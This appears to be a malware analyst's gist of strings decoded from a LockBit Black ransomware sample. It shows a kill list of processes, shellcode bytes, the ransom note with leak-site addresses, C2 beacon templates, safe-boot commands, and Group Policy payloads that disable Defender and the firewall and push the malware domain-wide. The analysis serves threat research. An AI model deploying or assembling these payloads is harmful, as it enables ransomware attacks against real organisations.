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\x00', 15686)

base64 blob has utf-16 strings:

u'sql\x00oracle\x00ocssd\x00dbsnmp\x00synctime\x00agntsvc\x00isqlplussvc\x00xfssvccon\x00mydesktopservice\x00ocautoupds\x00encsvc\x00firefox\x00tbirdconfig\x00mydesktopqos\x00ocomm\x00dbeng50\x00sqbcoreservice\x00excel\x00infopath\x00msaccess\x00mspub\x00onenote\x00outlook\x00powerpnt\x00steam\x00thebat\x00thunderbird\x00visio\x00winword\x00wordpad\x00notepad\x00\x00'

@sysopfb
Copy link
Author

sysopfb commented Jul 11, 2022

Decoded blobs from sample: d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee

u'LockBit Black\r\n\r\nAll your important files are stolen and encrypted!\r\nYou must find %s file\r\nand follow the instruction!\x00'
'                                    Lock    '

"\xe8\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00wtsapi32.dll\x00[h\xb2^\xd0'\xe8\xad\x00\x00\x00\x8dK\x10Q\xff\xd0h\xc2Q\xba\x1b\xe8\x9d\x00\x00\x00\x8b\x13\x8dK\x08QR\xff\xd0h\x81\xf0\xfd\xa9\xe8\x8a\x00\x00\x00\x8dK\x0c\x8bS\x08j\x02j\x00j\x00Q\xffs\x04Rj\xff\xff\xd0h\x1a\xfd?\x1a\xe8k\x00\x00\x00\x8b\xf0\xffs\x04\xff\xd6\xffs\x08\xff\xd6\x8bC\x0c\xc3U\x8b\xecRV3\xc0\x8bU\x0c\x8bu\x08f\xadf\x83\xf8Ar\nf\x83\xf8Zw\x04f\x83\xc8 \x80\xc6a\x80\xeea\xc1\xca\r\x03\xd0\x85\xc0u\xdf\x8b\xc2^Z]\xc2\x08\x00U\x8b\xecRV3\xc0\x8bU\x0c\x8bu\x08\xac\x80\xc6a\x80\xeea\xc1\xca\r\x03\xd0\x85\xc0u\xf0\x8b\xc2^Z]\xc2\x08\x00U\x8b\xec\x83\xc4\xf4SQRVW\xc7E\xfc\x00\x00\x00\x00d\xa10\x00\x00\x00\x8b@\x0c\x8dX\x0c\x8bH\x0c\x8bY\x18\x8bC<\x03\xc3\x8bPx\x85\xd2t^\x8dy,j\x00\xffw\x04\xe8h\xff\xff\xff\x89E\xf4\x03\xd3\x8bB\x18\x85\xc0t=\x89E\xf8\x8br \x8bz$\x03\xf3\x03\xfb\xad\x03\xc3\xffu\xf4P\xe8y\xff\xff\xff;E\x08u\x13\x0f\xb77\xc1\xe6\x02\x03r\x1c\x03\xf3\xad\x03\xc3\x89E\xfc\xeb\x0c\x83\xc7\x02\xffM\xf8\x83}\xf8\x00u\xd0\x83}\xfc\x00t\x02\xeb\x06\x8b\t;\xd9u\x8d\x8bE\xfc_^ZY[\x8b\xe5]\xc2\x04\x00"


"H\x83\xecH\xe8)\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00wtsapi32.dll\x00[\xb9\xb2^\xd0'\xe8\xed\x00\x00\x00H\x8dK\x1c\xff\xd0\xb9\xc2Q\xba\x1b\xe8\xdd\x00\x00\x00\x8b\x0bH\x8dS\x0c\xff\xd0\xb9\x81\xf0\xfd\xa9\xe8\xcb\x00\x00\x00L\x8dK\x14H\x8bS\x0cH\xc7\xc1\xff\xff\xff\xffL\x8bC\x04H\xc7D$ \x00\x00\x00\x00H\xc7D$(\x00\x00\x00\x00H\xc7D$0\x02\x00\x00\x00\xff\xd0\xb9\x1a\xfd?\x1a\xe8\x91\x00\x00\x00L\x8b\xf8H\x8bK\x04A\xff\xd7H\x8bK\x0cA\xff\xd7H\x8bC\x14H\x83\xc4H\xc3H\x89L$\x08\x89T$\x10HUSVH\x8b\xec3\xc0\x8b](H\x8bu f\xadf\x83\xf8Ar\nf\x83\xf8Zw\x04f\x83\xc8 \x80\xc7a\x80\xefa\xc1\xcb\r\x03\xd8\x85\xc0u\xdfH\x8b\xc3H\x8b\xe5^[]\xc3H\x89L$\x08\x89T$\x10HUSVH\x8b\xec3\xc0\x8b](H\x8bu \xac\x80\xc7a\x80\xefa\xc1\xcb\r\x03\xd8\x85\xc0u\xf0H\x8b\xc3H\x8b\xe5^[]\xc3\x89L$\x08HURSVWAPAQH\x83\xec0H\x8dl$0H\xc7E\xf8\x00\x00\x00\x00eH\x8b\x04%`\x00\x00\x00H\x8b@\x18H\x8dX\x10L\x8b@\x10I\x8bX0\x8bC<H\x03\xc3D\x8b\x88\x88\x00\x00\x00E\x85\xc9toI\x8dxXH\x8bO\x083\xd2\xe80\xff\xff\xff\x89E\xf0L\x03\xcbA\x8bA\x18\x85\xc0tI\x89E\xf4A\x8bq A\x8by$H\x03\xf3H\x03\xfb\xadH\x03\xc3H\x8b\xc8\x8bU\xf0\xe8F\xff\xff\xff;E@u\x17\x0f\xb77\xc1\xe6\x02A\x03q\x1cH\x03\xf3\xadH\x03\xc3H\x89E\xf8\xeb\rH\x83\xc7\x02\xffM\xf4\x83}\xf4\x00u\xc8H\x83}\xf8\x00t\x02\xeb\x0cM\x8b\x00I;\xd8\x0f\x85o\xff\xff\xffH\x8bE\xf8H\x8de\x00AYAX_^[Z]\xc3"


j\xe8\x00


'LockBit Black Ransomware\r\n\r\nYour data are stolen and encrypted\r\n\r\nThe data will be published on TOR website\r\nhttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion\r\nand http://lockbitapt.uz if you do not pay the ransom\r\n\r\nYou can contact us and decrypt one file for free on these TOR sites\r\nhttp://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onion\r\nhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion\r\nhttp://lockbitsupp.uz\r\n\r\nDecryption ID: %s'

'"host_hostname":"%s",\r\n"host_user":"%s",\r\n"host_os":"%s",\r\n"host_domain":"%s",\r\n"host_arch":"%s",\r\n"host_lang":"%s",\r\n%s'

'{\r\n"disk_name":"%s",\r\n"disk_size":"%u",\r\n"free_size":"%u"\r\n}'

'"disks_info":[\r\n%s\r\n]'

'Mozilla/5.0 (Windows NT 6.1)'

'AppleWebKit/587.38 (KHTML, like Gecko)'

'Chrome/91.0.4472.77'

'Safari/537.36'

'Edge/1.0.864.3'

'Firefox/89.0'

'Gecko/20100101'

'\r\nAccept: */*\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: text/plain'

'{\r\n"bot_version":"%s",\r\n"bot_id":"%s",\r\n"bot_company":"%.8x%.8x%.8x%.8x%",\r\n%s\r\n}'


'{\r\n"bot_version":"%s",\r\n"bot_id":"%s",\r\n"bot_company":"%.8x%.8x%.8x%.8x%",\r\n"stat_all_files":"%u",\r\n"stat_not_encrypted":"%u",\r\n"stat_size":"%s",\r\n"execution_time":"%u",\r\n"start_time":"%u",\r\n"stop_time":"%u"\r\n}'


Onboard EXE file: 917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2


'\xda\xbd\x07\xbb\x86\xfc\x96\x07\xd2\xed\x0b\xb5xl\xa1W'


'SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE'

'DisablePrivacyExperience'

'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'

'AutoAdminLogon'

'DefaultUserName'


'DefaultDomainName'


'DefaultPassword'


'bcdedit /set {current} safeboot network'

'bcdedit /deletevalue {current} safeboot'

'bootcfg /raw /a /safeboot:network /id 1'

'bootcfg /raw /fastdetect /id 1'

'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce'


'%s -pass %s'


Onboard EXE: 63c8efca0f52ebea1b3b2305e17580402f797a90611b3507fab6fffa7f700383


"powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}"

'<?xml version="1.0" encoding="utf-8"?>\r\n<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}">\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLPBDMS" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLPBENGINE" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0"><Properties startupType="DISABLED" serviceName="MSSQLFDLauncher" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLSERVERAGENT" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="MSSQLServerOLAPService" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SSASTELEMETRY" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Client" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Controller" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="MsDtsServer150" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SSISTELEMETRY150" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SSISScaleOutMaster150" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SSISScaleOutWorker150" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="MSSQLLaunchpad" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLTELEMETRY" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="MSSQLSERVER" serviceAction="STOP" timeout="60"/></NTService>\r\n</NTServices>\r\n'


'<?xml version="1.0" encoding="utf-8"?>\r\n<Files clsid="{215B2E53-57CE-475c-80FE-9EEC14635851}">\r\n\t<File clsid="{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}" name="%s" status="%s" image="2" bypassErrors="1" changed="%s" uid="%s">\r\n\t<Properties action="U" fromPath="%s" targetPath="%s" readOnly="0" archive="1" hidden="0" suppress="0"/>\r\n\t</File>\r\n</Files>\r\n'

'<?xml version="1.0" encoding="utf-8"?>\r\n<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">\r\n\t<TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="%s" image="2" changed="%s" uid="%s"><Properties action="U" name="%s" runAs="%s" logonType="InteractiveToken"><Task version="1.2"><RegistrationInfo><Author>%s</Author><Description></Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%s</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>false</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>false</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority></Settings><Triggers><RegistrationTrigger><Enabled>true</Enabled></RegistrationTrigger></Triggers><Actions Context="Author"><Exec><Command>%s</Command><Arguments>%s</Arguments></Exec></Actions></Task></Properties></TaskV2>\r\n</ScheduledTasks>\r\n'

'PReg\x01[SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeDC;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeOffsetDC;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTime;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeOffset;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows\\System;EnableSmartScreen;\x04;\x04;][SOFTWARE\\Policies\\Microsoft\\Windows\\System;**del.ShellSmartScreenLevel;\x01;\x04; ][SOFTWARE\\Policies\\Microsoft\\Windows Defender;DisableAntiSpyware;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows Defender;DisableRoutinelyTakingAction;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection;DisableRealtimeMonitoring;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection;DisableBehaviorMonitoring;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet;SubmitSamplesConsent;\x04;\x04;\x02][SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet;SpynetReporting;\x04;\x04;][SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile;EnableFirewall;\x04;\x04;][SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile;EnableFirewall;\x04;\x04;]'

'\xef\xbb\xbf<?xml version=\'1.0\' encoding=\'utf-8\'?>\r\n<policyComments xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/CommentDefinitions">\r\n  <policyNamespaces>\r\n    <using prefix="ns0" namespace="Microsoft.Policies.GroupPolicy"></using>\r\n    <using prefix="ns1" namespace="Microsoft.Policies.SmartScreen"></using>\r\n    <using prefix="ns2" namespace="Microsoft.Policies.WindowsDefender"></using>\r\n    <using prefix="ns3" namespace="Microsoft.Policies.WindowsFirewall"></using>\r\n  </policyNamespaces>\r\n  <comments>\r\n    <admTemplate></admTemplate>\r\n  </comments>\r\n  <resources minRequiredRevision="1.0">\r\n    <stringTable></stringTable>\r\n  </resources>\r\n</policyComments>'

'<?xml version="1.0" encoding="utf-8"?>\r\n<NetworkShareSettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}">\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_D" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_D" path="D:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_E" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_E" path="E:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_F" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_F" path="F:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_G" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_G" path="G:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_H" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_H" path="H:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_I" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_I" path="I:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_J" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_J" path="J:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_K" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_K" path="K:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_L" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_L" path="L:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_M" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_M" path="M:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_N" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_N" path="N:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_O" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_O" path="O:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_P" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_P" path="P:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_Q" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_Q" path="Q:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_R" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_R" path="R:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_S" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_S" path="S:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_T" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_T" path="T:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_U" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_U" path="U:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_V" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_V" path="V:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_W" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_W" path="W:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_X" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_X" path="X:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_Y" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_Y" path="Y:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_Z" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_Z" path="Z:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n</NetworkShareSettings>\r\n'

'[{\x000\x000\x000\x00\x000'


onboard EXE: d641ad955ef4cff5f0239072b3990d47e17b9840e07fd5feea93c372147313c5


